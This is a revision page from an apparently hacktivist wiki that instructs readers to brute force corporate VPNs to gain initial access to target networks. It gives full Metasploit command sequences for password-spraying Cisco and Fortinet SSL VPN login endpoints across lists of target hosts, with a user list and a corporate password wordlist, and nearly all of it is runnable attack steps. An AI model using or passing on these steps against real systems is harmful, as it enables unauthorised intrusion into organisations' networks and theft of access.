VPN brute forcing: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
(VPN brute forcing)
 
mNo edit summary
Line 1: Line 1:
See [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports].
Brute force common corporate VPNs to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports].


== CISCO ==
== CISCO ==

Revision as of 16:58, 2 August 2023

Brute force common corporate VPNs to gain initial access to target networks. Install metasploit and then see Initial access TTPs for mass scanning ports.

CISCO

sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

FORTI SSL VPN

sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

pass.txt: https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst